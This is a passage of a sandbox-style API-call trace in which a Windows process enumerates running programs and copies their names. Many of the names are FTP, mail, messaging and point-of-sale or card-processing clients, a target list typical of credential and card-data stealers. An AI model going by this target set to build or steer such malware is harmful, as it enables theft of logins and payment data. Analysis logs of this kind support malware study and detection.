th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="pressure_former.exe")) returned 1 [0117.236] GetCurrentProcessId () returned 0xde0 [0117.236] GetProcessHeap () returned 0x500000 [0117.236] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x2463b50 [0117.236] lstrcpyW (in: lpString1=0x2463b58, lpString2="pressure_former.exe" | out: lpString1="pressure_former.exe") returned="pressure_former.exe" [0117.236] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="project.exe")) returned 1 [0117.237] GetCurrentProcessId () returned 0xde0 [0117.237] GetProcessHeap () returned 0x500000 [0117.237] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x24612d0 [0117.237] lstrcpyW (in: lpString1=0x24612d8, lpString2="project.exe" | out: lpString1="project.exe") returned="project.exe" [0117.237] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="body.exe")) returned 1 [0117.238] GetCurrentProcessId () returned 0xde0 [0117.238] GetProcessHeap () returned 0x500000 [0117.238] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x2461e10 [0117.238] lstrcpyW (in: lpString1=0x2461e18, lpString2="body.exe" | out: lpString1="body.exe") returned="body.exe" [0117.239] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="though.exe")) returned 1 [0117.239] GetCurrentProcessId () returned 0xde0 [0117.239] GetProcessHeap () returned 0x500000 [0117.239] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x2463250 [0117.239] lstrcpyW (in: lpString1=0x2463258, lpString2="though.exe" | out: lpString1="though.exe") returned="though.exe" [0117.239] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0117.240] GetCurrentProcessId () returned 0xde0 [0117.240] GetProcessHeap () returned 0x500000 [0117.240] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x2462710 [0117.240] lstrcpyW (in: lpString1=0x2462718, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0117.240] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0117.241] GetCurrentProcessId () returned 0xde0 [0117.241] GetProcessHeap () returned 0x500000 [0117.241] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x2460550 [0117.241] lstrcpyW (in: lpString1=0x2460558, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0117.241] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0117.242] GetCurrentProcessId () returned 0xde0 [0117.242] GetProcessHeap () returned 0x500000 [0117.242] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x2461090 [0117.242] lstrcpyW (in: lpString1=0x2461098, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0117.242] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0117.243] GetCurrentProcessId () returned 0xde0 [0117.243] GetProcessHeap () returned 0x500000 [0117.243] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x2462950 [0117.243] lstrcpyW (in: lpString1=0x2462958, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0117.243] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0117.244] GetCurrentProcessId () returned 0xde0 [0117.244] GetProcessHeap () returned 0x500000 [0117.244] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x2460e50 [0117.244] lstrcpyW (in: lpString1=0x2460e58, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0117.244] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0117.245] GetCurrentProcessId () returned 0xde0 [0117.245] GetProcessHeap () returned 0x500000 [0117.245] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x2462b90 [0117.245] lstrcpyW (in: lpString1=0x2462b98, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0117.245] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0117.246] GetCurrentProcessId () returned 0xde0 [0117.246] GetProcessHeap () returned 0x500000 [0117.246] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x2463010 [0117.247] lstrcpyW (in: lpString1=0x2463018, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0117.247] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xea8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0117.248] GetCurrentProcessId () returned 0xde0 [0117.248] GetProcessHeap () returned 0x500000 [0117.248] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x24636d0 [0117.248] lstrcpyW (in: lpString1=0x24636d8, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0117.248] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0117.249] GetCurrentProcessId () returned 0xde0 [0117.249] GetProcessHeap () returned 0x500000 [0117.249] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x2463d90 [0117.249] lstrcpyW (in: lpString1=0x2463d98, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0117.249] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xec8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0117.250] GetCurrentProcessId () returned 0xde0 [0117.250] GetProcessHeap () returned 0x500000 [0117.250] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x24600d0 [0117.250] lstrcpyW (in: lpString1=0x24600d8, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0117.250] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xed0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0117.250] GetCurrentProcessId () returned 0xde0 [0117.251] GetProcessHeap () returned 0x500000 [0117.251] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x2460310 [0117.251] lstrcpyW (in: lpString1=0x2460318, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0117.251] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xee0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0117.251] GetCurrentProcessId () returned 0xde0 [0117.251] GetProcessHeap () returned 0x500000 [0117.251] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x535f00 [0117.252] lstrcpyW (in: lpString1=0x535f08, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0117.252] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xee8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0117.253] GetCurrentProcessId () returned 0xde0 [0117.253] GetProcessHeap () returned 0x500000 [0117.253] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x5338c0 [0117.253] lstrcpyW (in: lpString1=0x5338c8, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0117.253] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0117.254] GetCurrentProcessId () returned 0xde0 [0117.254] GetProcessHeap () returned 0x500000 [0117.254] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x536a40 [0117.254] lstrcpyW (in: lpString1=0x536a48, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0117.254] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xefc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0117.255] GetCurrentProcessId () returned 0xde0 [0117.255] GetProcessHeap () returned 0x500000 [0117.255] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x5353c0 [0117.255] lstrcpyW (in: lpString1=0x5353c8, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0117.255] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0117.256] GetCurrentProcessId () returned 0xde0 [0117.256] GetProcessHeap () returned 0x500000 [0117.256] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x535180 [0117.256] lstrcpyW (in: lpString1=0x535188, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0117.256] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0117.258] GetCurrentProcessId () returned 0xde0 [0117.258] GetProcessHeap () returned 0x500000 [0117.258] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x533b00 [0117.258] lstrcpyW (in: lpString1=0x533b08, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0117.258] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0117.259] GetCurrentProcessId () returned 0xde0 [0117.259] GetProcessHeap () returned 0x500000 [0117.259] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x535cc0 [0117.259] lstrcpyW (in: lpString1=0x535cc8, lpString2="outlook.exe" | out: lpString1="outlook.exe") returned="outlook.exe" [0117.259] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0117.260] GetCurrentProcessId () returned 0xde0 [0117.260] GetProcessHeap () returned 0x500000 [0117.260] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x534ac0 [0117.260] lstrcpyW (in: lpString1=0x534ac8, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0117.260] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0117.261] GetCurrentProcessId () returned 0xde0 [0117.261] GetProcessHeap () returned 0x500000 [0117.261] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x536140 [0117.261] lstrcpyW (in: lpString1=0x536148, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0117.261] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0117.262] GetCurrentProcessId () returned 0xde0 [0117.262] GetProcessHeap () returned 0x500000 [0117.263] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x536c80 [0117.263] lstrcpyW (in: lpString1=0x536c88, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0117.263] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0117.264] GetCurrentProcessId () returned 0xde0 [0117.264] GetProcessHeap () returned 0x500000 [0117.264] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x536380 [0117.264] lstrcpyW (in: lpString1=0x536388, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0117.264] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0117.265] GetCurrentProcessId () returned 0xde0 [0117.265] GetProcessHeap () returned 0x500000 [0117.265] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x534400 [0117.265] lstrcpyW (in: lpString1=0x534408, lpString2="thunderbird.exe" | out: lpString1="thunderbird.exe") returned="thunderbird.exe" [0117.265] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0117.266] GetCurrentProcessId () returned 0xde0 [0117.266] GetProcessHeap () returned 0x500000 [0117.266] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x536ec0 [0117.266] lstrcpyW (in: lpString1=0x536ec8, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0117.266] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0117.267] GetCurrentProcessId () returned 0xde0 [0117.267] GetProcessHeap () returned 0x500000 [0117.267] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x5365c0 [0117.267] lstrcpyW (in: lpString1=0x5365c8, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0117.267] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0117.268] GetCurrentProcessId () returned 0xde0 [0117.268] GetProcessHeap () returned 0x500000 [0117.268] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x533200 [0117.268] lstrcpyW (in: lpString1=0x533208, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0117.268] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0117.269] GetCurrentProcessId () returned 0xde0 [0117.269] GetProcessHeap () returned 0x500000 [0117.269] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x533d40 [0117.269] lstrcpyW (in: lpString1=0x533d48, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0117.269] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0117.270] GetCurrentProcessId () returned 0xde0 [0117.270] GetProcessHeap () returned 0x500000 [0117.270] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x533440 [0117.270] lstrcpyW (in: lpString1=0x533448, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0117.270] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xfa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0117.271] GetCurrentProcessId () returned 0xde0 [0117.271] GetProcessHeap () returned 0x500000 [0117.271] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x533680 [0117.271] lstrcpyW (in: lpString1=0x533688, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0117.271] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0117.272] GetCurrentProcessId () returned 0xde0 [0117.272] GetProcessHeap () returned 0x500000 [0117.272] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x534d00 [0117.272] lstrcpyW (in: lpString1=0x534d08, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0117.272] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0117.483] GetCurrentProcessId () returned 0xde0 [0117.483] GetProcessHeap () returned 0x500000 [0117.483] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x533f80 [0117.483] lstrcpyW (in: lpString1=0x533f88, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0117.483] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0117.484] GetCurrentProcessId () returned 0xde0 [0117.484] GetProcessHeap () returned 0x500000 [0117.484] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x534640 [0117.484] lstrcpyW (in: lpString1=0x534648, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0117.484] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xfd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0117.485] GetCurrentProcessId () returned 0xde0 [0117.485] GetProcessHeap () returned 0x500000 [0117.485] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x5341c0 [0117.485] lstrcpyW (in: lpString1=0x5341c8, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0117.485] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0117.486] GetCurrentProcessId () returned 0xde0 [0117.486] GetProcessHeap () returned 0x500000 [0117.486] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x534880 [0117.486] lstrcpyW (in: lpString1=0x534888, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0117.486] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0117.487] GetCurrentProcessId () returned 0xde0 [0117.487] GetProcessHeap () returned 0x500000 [0117.487] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x534f40 [0117.487] lstrcpyW (in: lpString1=0x534f48, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0117.487] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0117.487] GetCurrentProcessId () returned 0xde0 [0117.488] GetProcessHeap () returned 0x500000 [0117.488] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x535600 [0117.488] lstrcpyW (in: lpString1=0x535608, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0117.488] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x380, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0117.488] GetCurrentProcessId () returned 0xde0 [0117.489] GetProcessHeap () returned 0x500000 [0117.489] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x535840 [0117.489] lstrcpyW (in: lpString1=0x535848, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0117.489] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0117.489] GetCurrentProcessId () returned 0xde0 [0117.489] GetProcessHeap () returned 0x500000 [0117.489] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x535a80 [0117.490] lstrcpyW (in: lpString1=0x535a88, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0117.490] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0117.490] GetCurrentProcessId () returned 0xde0 [0117.490] GetProcessHeap () returned 0x500000 [0117.491] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x536800 [0117.491] lstrcpyW (in: lpString1=0x536808, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0117.491] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x101c, 